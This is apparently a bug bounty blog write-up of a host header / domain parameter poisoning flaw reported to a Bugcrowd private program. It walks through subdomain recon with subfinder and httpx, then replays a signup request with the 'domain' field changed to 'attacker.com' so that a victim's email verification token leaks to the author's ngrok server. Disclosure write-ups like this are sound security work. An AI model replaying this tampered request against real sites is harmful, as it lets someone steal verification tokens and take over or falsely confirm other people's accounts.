BOOK THIS SPACE FOR AD
ARTICLE ADGreeting Everyone ! I am pallab Twitter (@PJBorah2) Today I going to share my first Accepted p2 Bug I found on Bugcrowd Private program How I found Host header Poisoning token leak that allow me to bypass confirmation schema of targeted domain .
As Im Hunting On target site xyz.com First thing I Done My Recon Process so I try to gather all the subdomain So here I used subfinder + httpx and I collect all subdomain with their status code , As basically after using both combine tool I Look for Only 200 & 302 Response .
subfinder -d target.com-silent | httpx -title -content-length -status-code
After That I got Subdomain and I look for all the subdomain with Their Response code 200 & 302 As I spend My 1 days As I Basically spend at least 2 hrs for one subdomain so after I choose another subdomain it looks like ground.xyz.com.
So Here functionality that we can create Account . Before Creating Account I Always gathered some Information as i used tools,
For Directory Search : fufu, dirsearch , wfuzz
For Content Discovery : gau, Paramspider, Waybackurl, httpx, Subfinder, sublist3r,
Then I gathered Information about target then i start my testing on targeted domain. Now, Let’s skip everything Let’s Reproduce How i able to Steal email verification token due to Host Header Poisoning .
Reproduce Of Testing Steps:
Step1:
I visit https://ground.target.com/ And Created New account Fill up form with Victim Email Which I am not authorized And capture Request Using Burp:
Step: 2.
In Request Section I see Functionality Based On Some third party API Service but it carried Original domain In Request section as “domain ” parameter As You see below request: ,
{“key”:”eyJwayI6NDc2MjEzLCJlbWFpbCI6ImFwa3Jzb2x1dGlvbnNAZ21haWwuY29tIn0:1k4Qwz:7LIEOO8iu-abVU3h1LoM6HUAFkw”,
“template_id”:”xyz”,”domain”:”ground.xyz.com”}
Now, As above Here Change Request:
{“key”:”eyJwayI6NDc2MjEzLCJlbWFpbCI6ImFwa3Jzb2x1dGlvbnNAZ21haWwuY29tIn0:1k4Qwz:7LIEOO8iu-abVU3h1LoM6HUAFkw”,
“template_id”:”xyz”,”domain”:”attacker.com”}
So i replace in domain name to attacker domain , and forward this request.
Step: 3.
Here As I used ngrok Server to capture request As Below Picture I Have confirmation token Which leak Through My supplied Server When the victim clicks the link ,
I successfully Submitted this Vulnerability With full proof o concept and finally I awarded with point because it was point only Bugcrowd private program.
Thank You , Hope You Enjoyed!
Stick With me On: Twitter PJBorah2
Linkedin: Pallab Jyoti Borah